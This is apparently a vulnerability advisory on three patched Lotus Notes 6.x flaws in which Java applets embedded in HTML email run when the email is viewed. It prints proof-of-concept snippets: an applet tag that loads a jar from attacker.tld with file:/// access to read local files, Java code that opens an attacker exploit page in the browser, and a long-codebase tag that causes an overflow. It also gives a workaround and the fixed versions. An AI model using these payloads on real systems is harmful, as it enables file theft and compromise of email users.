OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies,  etc. IBM estimates it is
used by 60 million people.

Out of academic interest, I'm posting some technical details of three
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during
July-August 2004 and a fix is available.



DETAILS
=======

The vulnerabilities involve Java applets embedded in HTML formatted
e-mail messages. A  contributing factor in all of the issues is that
such Java applets are automatically displayed when the e-mail message
is viewed (unlike with most e-mail clients).



* Vulnerability 1: global file read access

An e-mail message containing a Java Applet with the codebase
"file:///" gains unlimited read access to local files when the e-mail
is viewed. An example HTML snippet follows:

  <applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"
   width="1" height="1"></applet>

The applet's Java bytecode itself needn't be contained in the e-mail
but it's only referenced by the archive URL. The applet gets
automatically loaded when the e-mail is viewed. It has file read
access on the local system (can read whatever files the currently
logged in user can, and list hard drive contents). The applet can use
e.g. JavaScript to relay the files to the attacker.



* Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web
browser with the desired URL when an e-mail message is viewed. An
example piece of Java code to do this follows:

  public void init() {
    getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
  }

Under default settings, Internet Explorer is launched and the attacker
supplied URL is opened in it when the e-mail message is viewed. This
exposes the system to Internet Explorer vulnerabilities, greatly
widening the attack surface.



* Vulnerability 3: codebase buffer overflow

Opening an HTML e-mail message which contains an applet tag with a
long codebase parameter (over 500 bytes) causes an apparently
stack-based buffer overflow condition. It may be exploitable to run
arbitrary code on the victim system when the e-mail message is viewed.
This is an example piece of HTML to produce it:

 <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
  code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.



WORKAROUND
==========

Disabling Java applets can be used to protect from these
vulnerabilities. To disable Java applets, select File -> Preferences
-> User Preferences from the Notes client menu and uncheck the option
for "Enable Java applets."



SOLUTION
========

The issues have been addressed in Lotus Notes versions 6.5.4 and
6.0.5. For detailed fix information, see

http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Klikki Oy, Finland.



-- 
Jouko Pynnonen <jouko@iki.fi>
Klikki Oy
http://iki.fi/jouko